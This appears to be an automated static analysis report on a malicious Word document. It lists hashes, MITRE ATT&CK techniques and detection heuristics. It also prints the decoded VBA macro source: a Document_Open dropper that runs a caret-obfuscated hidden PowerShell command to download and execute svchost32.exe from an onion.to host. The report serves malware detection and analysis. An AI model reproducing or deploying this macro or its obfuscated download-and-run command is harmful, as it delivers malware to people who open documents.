Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7a499561909139e3…

MALICIOUS

Office (OLE)

42.0 KB Created: 2016-11-23 08:26:00 Authoring application: Microsoft Office Word First seen: 2016-12-03
MD5: 00b8233257f04b34b53e0a9ca08e6764 SHA-1: 5b3757ed9f8476ff1c7fbb07b654a61d76e76fee SHA-256: 7a499561909139e38586eeeebe412ca066e8b16abb9c0c02fecc8df4f4799c14
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059.003 Windows Command Shell T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to execute a command that downloads a second-stage executable from the URL 'https://pvjk6aukijrdwqwqs.onion.to/svchost32.exe' and saves it to a path constructed from concatenated strings. The document body explicitly instructs the user to enable macros, which is a common lure for macro-based malware.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-1844349 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1844349
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("cmd.exe /c " + akj + " -no^pr^o^file -wi^ndo^wstyle h^idd^en (Ne^w-Obj^ect Sy^stem^.Net.We^bC^lie^nt).Do^wnl^oadFi^le('ht^tp^s://pvj^k6a^ukij^rdw^wq^s.on^i^on.t^o/sv^ch^os^t^32.e^x^e','" + bfd + "&s" + bf + "& exit")
    End Sub
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Shell ("cmd.exe /c " + akj + " -no^pr^o^file -wi^ndo^wstyle h^idd^en (Ne^w-Obj^ect Sy^stem^.Net.We^bC^lie^nt).Do^wnl^oadFi^le('ht^tp^s://pvj^k6a^ukij^rdw^wq^s.on^i^on.t^o/sv^ch^os^t^32.e^x^e','" + bfd + "&s" + bf + "& exit")
    End Sub
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1068 bytes
SHA-256: 45807028f9261b258f4b6e13e319faec0f74ca395555cae538a07c3b16402966
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

akj = iffcdbg.TextBox1.Text

bf = iffcdbg.TextBox2.Text

bfd = iffcdbg.TextBox3.Text

Shell ("cmd.exe /c " + akj + " -no^pr^o^file -wi^ndo^wstyle h^idd^en (Ne^w-Obj^ect Sy^stem^.Net.We^bC^lie^nt).Do^wnl^oadFi^le('ht^tp^s://pvj^k6a^ukij^rdw^wq^s.on^i^on.t^o/sv^ch^os^t^32.e^x^e','" + bfd + "&s" + bf + "& exit")
End Sub

Attribute VB_Name = "iffcdbg"
Attribute VB_Base = "0{D9A0755E-7816-40F6-A65A-7B08B423D857}{6B647C3D-894A-442E-9360-12BF5F03E3C7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub TextBox2_Change()

End Sub